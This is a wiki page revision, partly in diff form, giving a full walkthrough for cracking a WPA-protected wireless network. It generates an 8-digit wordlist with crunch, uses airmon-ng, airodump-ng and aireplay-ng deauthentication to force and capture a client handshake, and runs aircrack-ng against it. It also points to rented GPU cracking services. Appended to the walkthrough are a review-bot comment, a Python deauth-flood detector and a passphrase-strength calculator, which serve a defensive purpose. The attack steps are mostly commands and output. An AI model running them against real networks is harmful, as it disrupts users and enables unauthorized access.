WLAN brute-force attack: Difference between revisions

From Xinux Wiki
Zeile 49: Zeile 49:
  
 
=monitor modus=
 
=monitor modus=
*airmon-ng start wlan1
+
*airmon-ng start $INT
airmon-ng start wlan1
 
<pre>
 
Found 5 processes that could cause trouble.
 
If airodump-ng, aireplay-ng or airtun-ng stops working after
 
a short period of time, you may want to kill (some of) them!
 
 
 
  PID Name
 
  618 NetworkManager
 
  712 wpa_supplicant
 
  825 avahi-daemon
 
  826 avahi-daemon
 
1520 dhclient
 
 
 
PHY Interface Driver Chipset
 
 
 
phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
 
phy1 wlan1 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
 
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
 
(mac80211 station mode vif disabled for [phy1]wlan1)
 
</pre>
 
  
 
=killen der problem prozesse=
 
=killen der problem prozesse=
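
Review bot: the new line `*airmon-ng start $INT` drops the only place where the resulting interface name and the interfering PIDs were documented. The sample output under the old `airmon-ng start wlan1` command is what shows `wlan1mon` and the PIDs 618, 712, 825, 826 and 1520 that the following kill section relies on. The page also sets `INT=wlan0`, while later steps still use `wlan1mon`. Suggest keeping the sample output and either deriving the monitor interface name from `$INT` in the later steps or noting that the name depends on the adapter chosen.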

Revision as of 14 October 2020, 16:11

Procedure

  1. Generate the password list
  2. Find the interface
  3. Put the interface into monitor mode
  4. Kill interfering processes
  5. Display the WLANs
  6. Capture the AP
  7. Wait for the client handshake (kill the connection if necessary)
  8. Start the brute force against the file
  9. Success


Generating the password list

  • crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes
858 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000 

crunch:  19% completed generating output

crunch:  38% completed generating output

crunch:  58% completed generating output

crunch:  76% completed generating output

crunch:  95% completed generating output

crunch: 100% completed generating output

Stopping interfering services

  • systemctl stop avahi-daemon
  • systemctl stop NetworkManager

list

  • airmon-ng
PHY     Interface       Driver          Chipset

phy0    wlan0           rtl8192cu       Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]

  • echo INT=wlan0 >> data
  • source data

Monitor mode

  • airmon-ng start $INT

Killing the problem processes

  • kill -9 618
  • kill -9 712
  • kill -9 825
  • kill -9 826
  • kill -9 1520

Check

  • airmon-ng check wlan1mon
No interfering processes found
If something is still running:
  • systemctl stop avahi-daemon
  • systemctl stop NetworkManager

Dump

We look for the BSSID of dd-wrt

  • airodump-ng wlan1mon

Wlan1mon1.jpg

Obtaining the handshake

  • BSSIDSTADION=44:74:6C:54:68:E8 # needed later
  • BSSIDAP=00:18:F8:DA:F7:94
  • CHANNEL=6
  • airodump-ng --bssid $BSSIDAP -c $CHANNEL -w wlan.cap wlan1mon

Wlan1mon2.jpg

Open a second window (sends deauthentication packets)

  • BSSIDSTADION=44:74:6C:54:68:E8
  • BSSIDAP=00:18:F8:DA:F7:94
  • aireplay-ng -0 50 -a $BSSIDAP -c $BSSIDSTADION wlan1mon
11:02:39  Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel 6
11:02:39  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 4 ACKs]
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 6 ACKs]
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 8 ACKs]
11:02:41  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 7 ACKs]
11:02:44  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|43 ACKs]
11:02:49  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [36|68 ACKs]
11:02:55  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
11:03:00  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
11:03:05  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
11:03:10  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
11:03:15  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:21  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 4|65 ACKs]
11:03:26  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:32  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|61 ACKs]
11:03:37  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|65 ACKs]
11:03:42  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|63 ACKs]
11:03:47  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:52  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:57  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [26|67 ACKs]
11:04:02  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
11:04:07  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
11:04:12  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]

This continues until the client is kicked off.

After the client reconnects, the handshake is captured.

Wlan1mon3.jpg
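
From the defender's side, the deauthentication burst shown above is easy to spot, because a normal disconnect produces one or two such frames, not dozens per second. The following detector is an added example, not part of the original wiki page; the comma-separated sensor format, the MAC addresses and the thresholds are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

# Constructed sample data (not from the page): locally administered MACs.
AP = "02:00:00:00:00:01"
STA_A = "02:00:00:00:00:0a"
STA_B = "02:00:00:00:00:0b"
# Hypothetical sensor export format: time,subtype,src,dst,bssid
SAMPLE = [f"1.000,deauth,{STA_A},{AP},{AP}"]            # one normal disconnect
SAMPLE += [f"5.000,beacon,{AP},ff:ff:ff:ff:ff:ff,{AP}"]
SAMPLE += [f"{10 + i / 64:.3f},deauth,{AP},{STA_B},{AP}" for i in range(64)]


def detect_deauth_floods(lines, window=5.0, threshold=20):
    """Return {(bssid, station): time of first alert} for deauth bursts."""
    recent = defaultdict(deque)   # (bssid, station) -> timestamps in window
    alerts = {}
    for line in lines:
        fields = line.strip().lower().split(",")
        if len(fields) != 5 or fields[1] != "deauth":
            continue              # skip malformed rows and other frame types
        ts = float(fields[0])
        src, dst, bssid = fields[2:]
        # The frame may claim to come from either side; key on the pair.
        station = dst if src == bssid else src
        times = recent[(bssid, station)]
        times.append(ts)
        while ts - times[0] > window:
            times.popleft()
        if len(times) >= threshold:
            alerts.setdefault((bssid, station), ts)
    return alerts


if __name__ == "__main__":
    for (bssid, station), ts in detect_deauth_floods(SAMPLE).items():
        print(f"deauth flood: bssid={bssid} station={station} first alert t={ts}")
```

Enabling Protected Management Frames (802.11w) on the AP and clients makes forged deauthentication frames ineffective, so such an alert on a PMF network mainly indicates an attempt rather than a successful disconnect.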

handshake

HANDSHAKE=00:18:F8:DA:F7:94

Cracking

  • aircrack-ng -w password.lst -b $BSSIDAP wlan.cap-01.cap

Wlan1mon4.jpg

Cracking speeds

A laptop manages roughly 1000 keys per second

A powerful graphics card (Titan XP) manages 520000 hash/s

If needed, computing power can also be rented online

https://www.gpuhash.me/?menu=en-tasks

or you can build a cluster of several graphics cards


Source: http://www.crackingservice.com/?q=node/20
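
The speeds quoted above translate directly into a passphrase policy. This added example (not from the original wiki page) reproduces the crunch figures for 8-digit numeric keys and computes how long a random passphrase must be to outlast a chosen time budget. The ten-year target and the character-set sizes are assumptions, and rented or clustered GPUs raise the rate further.

```python
LAPTOP_RATE = 1_000        # keys/s, laptop figure quoted on this page
GPU_RATE = 520_000         # hash/s, Titan XP figure quoted on this page
TEN_YEARS = 10 * 365 * 24 * 3600   # assumed target: 315,360,000 s
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63   # WPA/WPA2 passphrase length limits


def keyspace(charset_size, length):
    """Number of candidates when every position is chosen at random."""
    return charset_size ** length


def wordlist_bytes(charset_size, length):
    """Size of the full list on disk: one candidate plus newline per line."""
    return keyspace(charset_size, length) * (length + 1)


def worst_case_seconds(charset_size, length, rate):
    """Time to try every candidate at `rate` guesses per second."""
    return keyspace(charset_size, length) / rate


def min_length(charset_size, rate=GPU_RATE, target=TEN_YEARS):
    """Shortest valid passphrase length whose keyspace outlasts `target`."""
    for length in range(WPA_MIN_LEN, WPA_MAX_LEN + 1):
        if worst_case_seconds(charset_size, length, rate) > target:
            return length
    return None   # charset too small even at 63 characters


if __name__ == "__main__":
    for name, size in [("digits", 10), ("lowercase", 26), ("alphanumeric", 62)]:
        secs = worst_case_seconds(size, 8, GPU_RATE)
        print(f"{name:12} 8 chars: {secs:,.0f} s at GPU rate, "
              f"needs length {min_length(size)} for ten years")
```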